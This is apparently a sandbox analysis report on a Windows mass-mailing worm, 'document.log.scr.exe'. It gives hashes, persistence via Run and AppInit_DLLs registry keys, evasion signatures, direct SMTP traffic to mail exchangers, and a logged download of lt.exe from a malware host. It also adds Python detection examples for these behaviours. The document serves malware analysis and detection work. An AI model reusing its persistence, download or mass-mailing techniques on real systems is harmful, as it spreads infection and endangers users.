Windows Analysis Report
document.log.scr.exe

Overview

General Information

Sample name: document.log.scr.exe
Analysis ID: 1546160
MD5: 203e91d369913b5768296e416b0c86d5
SHA1: 91ff86480474cbc5b49644700674440f8691b59f
SHA256: 99145da1ace397a51d6ed5bd96e1c0167554e6e4028f58a20ddc091ded0fafbe
Tags: exe, user-TeamDreier

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Contains functionality to inject threads in other processes
Creates an undocumented autostart registry key
Detected PE file pumping (to bypass AV & sandboxing)
Drops executables to the windows directory (C:\Windows) and starts them
Initial sample is a PE file and has a suspicious name
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample has a suspicious name (potential lure to open the executable)
Tries to detect virtualization through RDTSC time measurements
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Extensive use of GetProcAddress (often used to hide API calls)
Found evasive API chain (may stop execution after checking a module file name)
Found evasive API chain checking for process token information
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Sigma detected: Wow6432Node Windows NT CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • document.log.scr.exe (PID: 3940 cmdline: "C:\Users\user\Desktop\document.log.scr.exe" MD5: 203E91D369913B5768296E416B0C86D5)
    • tserv.exe (PID: 4192 cmdline: C:\Windows\tserv.exe s MD5: 203E91D369913B5768296E416B0C86D5)
    • notepad.exe (PID: 4948 cmdline: C:\Windows\System32\notepad.exe C:\Users\user\Desktop\2BF7.tmp MD5: E92D3A824A0578A50D2DD81B5060145F)
  • tserv.exe (PID: 2256 cmdline: "C:\Windows\tserv.exe" s MD5: 203E91D369913B5768296E416B0C86D5)
  • cleanup
No configs have been found
No yara matches

System Summary

Sigma rule: Suspicious Outbound SMTP Connections | Source: Network Connection | Author: frack113 | Data: DestinationIp: 98.136.96.75, DestinationIsIpv6: false, DestinationPort: 25, EventID: 3, Image: C:\Windows\tserv.exe, Initiated: true, ProcessId: 4192, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
Sigma rule: Wow6432Node CurrentVersion Autorun Keys Modification | Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Windows\tserv.exe s, EventID: 13, EventType: SetValue, Image: C:\Windows\tserv.exe, ProcessId: 4192, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\tserv
Sigma rule: Wow6432Node Windows NT CurrentVersion Autorun Keys Modification | Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: msji449c14b7.dll, EventID: 13, EventType: SetValue, Image: C:\Windows\tserv.exe, ProcessId: 4192, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs
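The three Sigma hits above reduce to two conditions over Sysmon telemetry: a process that is not a mail client opening TCP/25 (Event ID 3), and a SetValue write (Event ID 13) to a Run/RunOnce key under Wow6432Node or to AppInit_DLLs. The following is an added example of that detection logic, not Joe Sandbox or Sigma project code. Sysmon events are modelled as plain dicts; the mail-client allow-list is an assumption made for the example, and the sample events are constructed from the Data rows of this report plus two benign controls.

```python
"""Detection logic for the Sigma hits in this report (added example; not
Joe Sandbox or Sigma project code). Sysmon events are plain dicts."""
import re

# Images that legitimately speak SMTP. This allow-list is an assumption for
# the example; a real deployment would use the organisation's own relays.
MAIL_CLIENTS = {r"\outlook.exe", r"\thunderbird.exe"}

# Registry paths the "Wow6432Node ... Autorun Keys Modification" rules watch,
# expressed as regexes over the Sysmon TargetObject field.
AUTORUN_KEY_PATTERNS = [
    re.compile(r"\\software\\wow6432node\\microsoft\\windows\\currentversion\\run(once)?\\", re.I),
    re.compile(r"\\software\\wow6432node\\microsoft\\windows nt\\currentversion\\windows\\appinit_dlls$", re.I),
]


def is_suspicious_smtp(event):
    """Sigma 'Suspicious Outbound SMTP Connections': Sysmon Event ID 3,
    initiated TCP connection to port 25, image not a known mail client."""
    if event.get("EventID") != 3 or not event.get("Initiated"):
        return False
    if event.get("Protocol", "").lower() != "tcp" or int(event.get("DestinationPort", 0)) != 25:
        return False
    image = event.get("Image", "").lower()
    return not any(image.endswith(client) for client in MAIL_CLIENTS)


def is_autorun_modification(event):
    """Sigma 'Wow6432Node ... Autorun Keys Modification': Sysmon Event ID 13
    SetValue on a Run/RunOnce key or on AppInit_DLLs under Wow6432Node."""
    if event.get("EventID") != 13 or event.get("EventType") != "SetValue":
        return False
    target = event.get("TargetObject", "")
    return any(p.search(target) for p in AUTORUN_KEY_PATTERNS)


def triage(events):
    """Return (rule name, image, detail) for every event matching a rule."""
    hits = []
    for ev in events:
        if is_suspicious_smtp(ev):
            hits.append(("Suspicious Outbound SMTP Connections", ev["Image"],
                         f"{ev['DestinationIp']}:{ev['DestinationPort']}"))
        if is_autorun_modification(ev):
            hits.append(("Wow6432Node Autorun Keys Modification", ev["Image"],
                         f"{ev['TargetObject']} = {ev.get('Details', '')}"))
    return hits


# Constructed sample events: the first three mirror the Sigma Data rows of
# this report; the last two are benign controls that must not fire.
SAMPLE_EVENTS = [
    {"EventID": 3, "Image": r"C:\Windows\tserv.exe", "ProcessId": 4192, "Initiated": True,
     "Protocol": "tcp", "SourceIp": "192.168.2.4", "SourcePort": 49730,
     "DestinationIp": "98.136.96.75", "DestinationPort": 25},
    {"EventID": 13, "EventType": "SetValue", "Image": r"C:\Windows\tserv.exe", "ProcessId": 4192,
     "TargetObject": r"HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\tserv",
     "Details": r"C:\Windows\tserv.exe s"},
    {"EventID": 13, "EventType": "SetValue", "Image": r"C:\Windows\tserv.exe", "ProcessId": 4192,
     "TargetObject": r"HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs",
     "Details": "msji449c14b7.dll"},
    # Benign: a real mail client talking SMTP (constructed).
    {"EventID": 3, "Image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "Initiated": True, "Protocol": "tcp", "SourceIp": "192.168.2.4", "SourcePort": 50100,
     "DestinationIp": "40.99.10.2", "DestinationPort": 25},
    # Benign: an Explorer setting outside the watched keys (constructed).
    {"EventID": 13, "EventType": "SetValue", "Image": r"C:\Windows\explorer.exe",
     "TargetObject": r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden",
     "Details": "DWORD (0x00000001)"},
]

if __name__ == "__main__":
    for rule, image, detail in triage(SAMPLE_EVENTS):
        print(f"{rule}: {image} -> {detail}")
```

Running it yields exactly the three report hits and nothing for the two controls. For triage, keep in mind that the AppInit_DLLs write only takes effect when LoadAppInit_DLLs is 1, and Windows 8 and later ignore AppInit_DLLs entirely when Secure Boot is enabled, so on a modern host the Run value is the persistence that matters; the standalone tserv.exe instance in the process tree (PID 2256, started with the same `s` argument the Run value carries) is what that value launches.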
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-31T15:26:31.150846+0100 | 2022930 | 1 | A Network Trojan was detected | 172.202.163.200 | 443 | 192.168.2.4 | 49732 | TCP
2024-10-31T15:27:10.072282+0100 | 2022930 | 1 | A Network Trojan was detected | 172.202.163.200 | 443 | 192.168.2.4 | 49750 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-31T15:26:28.058727+0100 | 2016998 | 1 | A Network Trojan was detected | 192.168.2.4 | 49731 | 193.166.255.171 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-31T15:26:15.935513+0100 | 2019714 | 2 | Potentially Bad Traffic | 192.168.2.4 | 50037 | 193.166.255.171 | 80 | TCP
2024-10-31T15:26:15.935513+0100 | 2019714 | 2 | Potentially Bad Traffic | 192.168.2.4 | 50036 | 193.166.255.171 | 80 | TCP
2024-10-31T15:26:28.951208+0100 | 2019714 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49731 | 193.166.255.171 | 80 | TCP
2024-10-31T15:26:37.558372+0100 | 2019714 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49733 | 193.166.255.171 | 80 | TCP
2024-10-31T15:26:46.221781+0100 | 2019714 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49739 | 193.166.255.171 | 80 | TCP
2024-10-31T15:26:54.839417+0100 | 2019714 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49742 | 193.166.255.171 | 80 | TCP
2024-10-31T15:26:54.851261+0100 | 2019714 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49741 | 193.166.255.171 | 80 | TCP
2024-10-31T15:27:03.434045+0100 | 2019714 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49744 | 193.166.255.171 | 80 | TCP
2024-10-31T15:27:03.467045+0100 | 2019714 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49745 | 193.166.255.171 | 80 | TCP
2024-10-31T15:27:12.073717+0100 | 2019714 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49746 | 193.166.255.171 | 80 | TCP
2024-10-31T15:27:12.094487+0100 | 2019714 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49747 | 193.166.255.171 | 80 | TCP
2024-10-31T15:27:20.771757+0100 | 2019714 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49763 | 193.166.255.171 | 80 | TCP
2024-10-31T15:27:20.771888+0100 | 2019714 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49762 | 193.166.255.171 | 80 | TCP
2024-10-31T15:27:29.358961+0100 | 2019714 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49807 | 193.166.255.171 | 80 | TCP
2024-10-31T15:27:29.372531+0100 | 2019714 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49808 | 193.166.255.171 | 80 | TCP
2024-10-31T15:27:37.966563+0100 | 2019714 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49849 | 193.166.255.171 | 80 | TCP
2024-10-31T15:27:37.973451+0100 | 2019714 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49850 | 193.166.255.171 | 80 | TCP
2024-10-31T15:27:47.095297+0100 | 2019714 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49896 | 193.166.255.171 | 80 | TCP
2024-10-31T15:27:47.095324+0100 | 2019714 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49894 | 193.166.255.171 | 80 | TCP
2024-10-31T15:27:55.713359+0100 | 2019714 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49937 | 193.166.255.171 | 80 | TCP
2024-10-31T15:27:55.714932+0100 | 2019714 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49936 | 193.166.255.171 | 80 | TCP
2024-10-31T15:28:04.318931+0100 | 2019714 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49982 | 193.166.255.171 | 80 | TCP
2024-10-31T15:28:04.322584+0100 | 2019714 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49981 | 193.166.255.171 | 80 | TCP
2024-10-31T15:28:12.965052+0100 | 2019714 | 2 | Potentially Bad Traffic | 192.168.2.4 | 50027 | 193.166.255.171 | 80 | TCP
2024-10-31T15:28:12.976431+0100 | 2019714 | 2 | Potentially Bad Traffic | 192.168.2.4 | 50028 | 193.166.255.171 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-31T15:26:15.935513+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 50037 | 193.166.255.171 | 80 | TCP
2024-10-31T15:26:15.935513+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 50036 | 193.166.255.171 | 80 | TCP
2024-10-31T15:26:28.951208+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49731 | 193.166.255.171 | 80 | TCP
2024-10-31T15:26:37.558372+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49733 | 193.166.255.171 | 80 | TCP
2024-10-31T15:26:46.221781+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49739 | 193.166.255.171 | 80 | TCP
2024-10-31T15:26:54.839417+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49742 | 193.166.255.171 | 80 | TCP
2024-10-31T15:26:54.851261+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49741 | 193.166.255.171 | 80 | TCP
2024-10-31T15:27:03.434045+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49744 | 193.166.255.171 | 80 | TCP
2024-10-31T15:27:03.467045+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49745 | 193.166.255.171 | 80 | TCP
2024-10-31T15:27:12.073717+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49746 | 193.166.255.171 | 80 | TCP
2024-10-31T15:27:12.094487+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49747 | 193.166.255.171 | 80 | TCP
2024-10-31T15:27:20.771757+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49763 | 193.166.255.171 | 80 | TCP
2024-10-31T15:27:20.771888+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49762 | 193.166.255.171 | 80 | TCP
2024-10-31T15:27:29.358961+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49807 | 193.166.255.171 | 80 | TCP
2024-10-31T15:27:29.372531+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49808 | 193.166.255.171 | 80 | TCP
2024-10-31T15:27:37.966563+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49849 | 193.166.255.171 | 80 | TCP
2024-10-31T15:27:37.973451+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49850 | 193.166.255.171 | 80 | TCP
2024-10-31T15:27:47.095297+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49896 | 193.166.255.171 | 80 | TCP
2024-10-31T15:27:47.095324+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49894 | 193.166.255.171 | 80 | TCP
2024-10-31T15:27:55.713359+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49937 | 193.166.255.171 | 80 | TCP
2024-10-31T15:27:55.714932+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49936 | 193.166.255.171 | 80 | TCP
2024-10-31T15:28:04.318931+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49982 | 193.166.255.171 | 80 | TCP
2024-10-31T15:28:04.322584+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49981 | 193.166.255.171 | 80 | TCP
2024-10-31T15:28:12.965052+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 50027 | 193.166.255.171 | 80 | TCP
2024-10-31T15:28:12.976431+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 50028 | 193.166.255.171 | 80 | TCP

AV Detection

Source: document.log.scr.exe | Avira: detected
Source: C:\Windows\tserv.exe | Avira: detection malicious, Label: WORM/Stration.C
Source: C:\Windows\tserv.exe | ReversingLabs: Detection: 94%
Source: document.log.scr.exe | ReversingLabs: Detection: 94%
Source: C:\Windows\tserv.exe | Joe Sandbox ML: detected
Source: document.log.scr.exe | Joe Sandbox ML: detected
Source: document.log.scr.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\Desktop\document.log.scr.exe | Code function: 0_2_00406360 GetFileAttributesA,lstrcpyA,lstrcatA,lstrcatA,FindFirstFileA,GetLastError,lstrcmpA,lstrcmpA,lstrcmpA,lstrcpyA,lstrcatA,lstrcatA,lstrcpyA,lstrcatA,FindNextFileA,FindClose
Source: global traffic | HTTP traffic detected (25 identical requests, one per flow to 193.166.255.171:80 in the Suricata tables above): GET /chr/wtb/lt.exe HTTP/1.1, Host: www4.cedesunjerinkas.com
Source: Joe Sandbox View | IP Address: 98.136.96.77
Source: Joe Sandbox View | IP Address: 67.195.228.94
Source: Joe Sandbox View | IP Address: 193.166.255.171
Source: Network traffic | Suricata IDS: 2016998 - Severity 1 - ET MALWARE Connection to Fitsec Sinkhole IP (Possible Infected Host) : 192.168.2.4:49731 -> 193.166.255.171:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4 -> 193.166.255.171:80 (25 flows; source ports 49731, 49733, 49739, 49741, 49742, 49744, 49745, 49746, 49747, 49762, 49763, 49807, 49808, 49849, 49850, 49894, 49896, 49936, 49937, 49981, 49982, 50027, 50028, 50036, 50037)
Source: Network traffic | Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4 -> 193.166.255.171:80 (the same 25 flows)
Source: Network traffic | Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.4:49732
Source: Network traffic | Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.4:49750
Source: global traffic | TCP traffic: 192.168.2.4:49730 -> 98.136.96.75:25
Source: global traffic | TCP traffic: 192.168.2.4:49743 -> 98.136.96.77:25
Source: global traffic | TCP traffic: 192.168.2.4:49748 -> 67.195.204.77:25
Source: global traffic | TCP traffic: 192.168.2.4:49751 -> 67.195.228.94:25
Source: global traffic | TCP traffic: 192.168.2.4:49858 -> 142.251.1.26:25
Source: global traffic | TCP traffic: 192.168.2.4:49963 -> 142.250.153.26:25
Source: global traffic | TCP traffic: 192.168.2.4:50035 -> 142.251.9.27:25
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (12 occurrences)
Source: global traffic | DNS traffic detected: DNS query: yahoo.com
Source: global traffic | DNS traffic detected: DNS query: mta5.am0.yahoodns.net
Source: global traffic | DNS traffic detected: DNS query: mta7.am0.yahoodns.net
Source: global traffic | DNS traffic detected: DNS query: mta6.am0.yahoodns.net
Source: global traffic | DNS traffic detected: DNS query: www4.cedesunjerinkas.com
Source: global traffic | DNS traffic detected: DNS query: gmail.com
Source: global traffic | DNS traffic detected: DNS query: alt2.gmail-smtp-in.l.google.com
Source: global traffic | DNS traffic detected: DNS query: alt4.gmail-smtp-in.l.google.com
Source: global traffic | DNS traffic detected: DNS query: alt3.gmail-smtp-in.l.google.com
Source: global traffic | DNS traffic detected: DNS query: alt1.gmail-smtp-in.l.google.com
Source: global traffic | DNS traffic detected: DNS query: gmail-smtp-in.l.google.com
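Two network behaviours in the section above are worth turning into checks. First, the repeated GET /chr/wtb/lt.exe carries no User-Agent and asks for a two-letter executable, which is what the Suricata "Common Downloader Header Pattern" and "Terse alphanumeric executable downloader" signatures key on; the destination is flagged as a Fitsec sinkhole, which is consistent with the sample retrying the download 25 times without ever getting the payload. Second, the host resolves yahoo.com and gmail.com, then the Yahoo and Gmail mail exchangers, then opens TCP/25 straight to those addresses: a workstation acting as its own MTA, the classic mass-mailer pattern. The following is an added example of both checks over constructed input, not Joe Sandbox or Suricata code; the request bytes, DNS answers and flows are constructed from the indicators on this page, and the "terse executable" regex is an approximation of the idea, not the actual ET rule.

```python
"""Network-side checks for the behaviour recorded in this report (added
example; not Joe Sandbox or Suricata code). All sample data is constructed."""
import re
from collections import defaultdict

# Constructed raw request mirroring the GET in the report: no User-Agent header.
SAMPLE_REQUEST = (
    b"GET /chr/wtb/lt.exe HTTP/1.1\r\n"
    b"Host: www4.cedesunjerinkas.com\r\n"
    b"\r\n"
)
# Constructed browser download of an executable, for comparison.
BENIGN_REQUEST = (
    b"GET /downloads/setup.exe HTTP/1.1\r\n"
    b"Host: example.org\r\n"
    b"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)\r\n"
    b"\r\n"
)


def parse_request(raw):
    """Split an HTTP/1.x request head into (method, path, headers) with
    lowercase header names. Only the head is parsed; any body is ignored."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def suspicious_exe_download(raw):
    """Return the reasons a request looks like a malware downloader ([] if none):
    a missing User-Agent, and a terse alphanumeric executable name such as
    /chr/wtb/lt.exe (one to four [a-z0-9] characters followed by .exe)."""
    _method, path, headers = parse_request(raw)
    reasons = []
    if "user-agent" not in headers:
        reasons.append("no User-Agent header")
    if re.search(r"/[a-z0-9]{1,4}\.exe$", path, re.I):
        reasons.append("terse alphanumeric executable path")
    return reasons


# Constructed DNS answers and TCP flows modelled on the report: mail-exchanger
# names for yahoo.com and gmail.com are resolved, then TCP/25 is opened to them.
SAMPLE_DNS = [  # (client, queried name, answer)
    ("192.168.2.4", "mta5.am0.yahoodns.net", "98.136.96.75"),
    ("192.168.2.4", "mta7.am0.yahoodns.net", "98.136.96.77"),
    ("192.168.2.4", "alt1.gmail-smtp-in.l.google.com", "142.251.1.26"),
    ("192.168.2.4", "www4.cedesunjerinkas.com", "193.166.255.171"),
]
SAMPLE_TCP = [  # (client, destination ip, destination port)
    ("192.168.2.4", "98.136.96.75", 25),
    ("192.168.2.4", "98.136.96.77", 25),
    ("192.168.2.4", "142.251.1.26", 25),
    ("192.168.2.4", "193.166.255.171", 80),
]


def direct_smtp_fanout(dns_records, tcp_flows, min_targets=2):
    """Return {client: [(name, ip), ...]} for clients that open TCP/25 to at
    least min_targets distinct addresses they themselves resolved. An end-user
    machine should hand mail to one relay, not fan out to public MX hosts."""
    resolved = defaultdict(dict)  # client -> answer ip -> queried name
    for client, name, ip in dns_records:
        resolved[client][ip] = name
    hits = defaultdict(list)
    for client, dst, port in tcp_flows:
        if port == 25 and dst in resolved[client]:
            hits[client].append((resolved[client][dst], dst))
    return {c: targets for c, targets in hits.items() if len(targets) >= min_targets}


if __name__ == "__main__":
    print(suspicious_exe_download(SAMPLE_REQUEST))  # both reasons fire
    print(suspicious_exe_download(BENIGN_REQUEST))  # []
    print(direct_smtp_fanout(SAMPLE_DNS, SAMPLE_TCP))  # 192.168.2.4 -> 3 MX hosts
```

The SMTP check deliberately requires that the client resolved the address itself: a host that only receives a relay address from configuration never appears in the DNS side of the join, which keeps ordinary Outlook-to-Exchange traffic out of the result.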

System Summary

Source: initial sample | Static PE information: Filename: document.log.scr.exe
Source: document.log.scr.exe | Static file information: Suspicious name
Source: C:\Users\user\Desktop\document.log.scr.exe | Code function: 0_2_00423D83 QueryDosDeviceA,lstrcpyA,lstrcatA,GetLastError,lstrcpyA,lstrcatA,DefineDosDeviceA,GetLastError,lstrcpyA,lstrcatA,CreateFileA,DeviceIoControl,GetLastError,GetLastError,DefineDosDeviceA,GetLastError
Source: C:\Users\user\Desktop\document.log.scr.exe | File created: C:\Windows\tserv.exe
Source: C:\Users\user\Desktop\document.log.scr.exe | File created: C:\Windows\tserv.exe\:Zone.Identifier:$DATA
Source: C:\Users\user\Desktop\document.log.scr.exe | Code functions: 0_2_00411800, 0_2_004108D0, 0_2_0040C8E0, 0_2_0040F0E9, 0_2_00410907, 0_2_00404110, 0_2_00409119, 0_2_0040F1C7, 0_2_0040C1D0, 0_2_00404990, 0_2_004091A7, 0_2_0040E246, 0_2_00428A08, 0_2_00425214, 0_2_00405310, 0_2_00408BC0, 0_2_00415BD0, 0_2_0041B3D0, 0_2_0040DBF0, 0_2_0041E3A0, 0_2_00409436, 0_2_00409CF7, 0_2_0041BD00, 0_2_0040EDE0, 0_2_0040DE56, 0_2_0041C660, 0_2_00410670, 0_2_0040E676, 0_2_00409F47, 0_2_0040EF78, 0_2_0040FF30, 0_2_00405F30
Source: C:\Users\user\Desktop\document.log.scr.exe | Code function: String function: 0042664C appears 45 times
Source: classification engine | Classification label: mal100.evad.winEXE@6/3@12/8
Source: C:\Users\user\Desktop\document.log.scr.exe | Code function: 0_2_004047A0 lstrcatA,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\Desktop\document.log.scr.exe | Code function: 0_2_00405090 GetSystemDirectoryA,lstrcatA,lstrcatA,lstrcatA,GetFileAttributesA,CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle
Source: C:\Users\user\Desktop\document.log.scr.exe | Code function: 0_2_0041E0B0 FindResourceA,LoadResource,SizeofResource,LockResource,CreateFileA,WriteFile,CloseHandle
Source: C:\Users\user\Desktop\document.log.scr.exe | File created: C:\Users\user\Desktop\2BF7.tmp
Source: C:\Windows\tserv.exe | Mutant created: NULL
Source: document.log.scr.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\document.log.scr.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: document.log.scr.exeReversingLabs: Detection: 94%
Source: C:\Users\user\Desktop\document.log.scr.exeFile read: C:\Users\user\Desktop\document.log.scr.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\document.log.scr.exe "C:\Users\user\Desktop\document.log.scr.exe"
Source: C:\Users\user\Desktop\document.log.scr.exeProcess created: C:\Windows\tserv.exe C:\Windows\tserv.exe s
Source: C:\Users\user\Desktop\document.log.scr.exeProcess created: C:\Windows\SysWOW64\notepad.exe C:\Windows\System32\notepad.exe C:\Users\user\Desktop\2BF7.tmp
Source: unknownProcess created: C:\Windows\tserv.exe "C:\Windows\tserv.exe" s
Source: C:\Users\user\Desktop\document.log.scr.exeProcess created: C:\Windows\tserv.exe C:\Windows\tserv.exe sJump to behavior
Source: C:\Users\user\Desktop\document.log.scr.exeProcess created: C:\Windows\SysWOW64\notepad.exe C:\Windows\System32\notepad.exe C:\Users\user\Desktop\2BF7.tmpJump to behavior
Sections (modules) loaded, grouped by process. The report lists tserv.exe twice because two instances ran.

Source: C:\Users\user\Desktop\document.log.scr.exe | Section loaded: apphelp.dll, cmut449c14b7.dll, ntmarta.dll
Source: C:\Windows\tserv.exe (first instance) | Section loaded: apphelp.dll, cmut449c14b7.dll, wininet.dll, dnsapi.dll, iphlpapi.dll, cmut449c14b7.dll, iertutil.dll, sspicli.dll, windows.storage.dll, wldp.dll, profapi.dll, kernel.appcore.dll, napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, mswsock.dll, winrnr.dll, fwpuclnt.dll, rasadhlp.dll, ondemandconnroutehelper.dll, winhttp.dll, winnsi.dll, urlmon.dll, srvcli.dll, netutils.dll
Source: C:\Windows\SysWOW64\notepad.exe | Section loaded: kernel.appcore.dll, uxtheme.dll, mrmcorer.dll, windows.storage.dll, wldp.dll, textshaping.dll, efswrt.dll, mpr.dll, wintypes.dll, twinapi.appcore.dll, oleacc.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, propsys.dll, policymanager.dll, msvcp110_win.dll
Source: C:\Windows\tserv.exe (second instance) | Section loaded: cmut449c14b7.dll, wininet.dll, dnsapi.dll, iphlpapi.dll, cmut449c14b7.dll, iertutil.dll, napinsp.dll, pnrpnsp.dll, sspicli.dll, wshbth.dll, nlaapi.dll, windows.storage.dll, wldp.dll, mswsock.dll, profapi.dll, winrnr.dll, kernel.appcore.dll, fwpuclnt.dll, rasadhlp.dll, ondemandconnroutehelper.dll, winhttp.dll, winnsi.dll, urlmon.dll, srvcli.dll, netutils.dll

The wininet/winhttp/dnsapi/mswsock loads plus the name-space providers (napinsp, pnrpnsp, wshbth, nlaapi, winrnr) are the normal footprint of a process doing DNS lookups and Winsock connections, which matches the SMTP traffic in the network section. cmut449c14b7.dll is loaded by both the sample and tserv.exe but is not among the dropped files and is not explained anywhere in the report; treat it as an open question rather than an indicator.

Source: C:\Windows\SysWOW64\notepad.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{11659a23-5884-4d1b-9cf6-67d6f4f90b36}\InProcServer32
Source: C:\Users\user\Desktop\document.log.scr.exe | Code function: 0_2_0041F660 LoadLibraryA, GetProcAddress, SetWindowsHookExA (installs a Windows hook from a dynamically loaded module; the hook type and target thread are not shown)
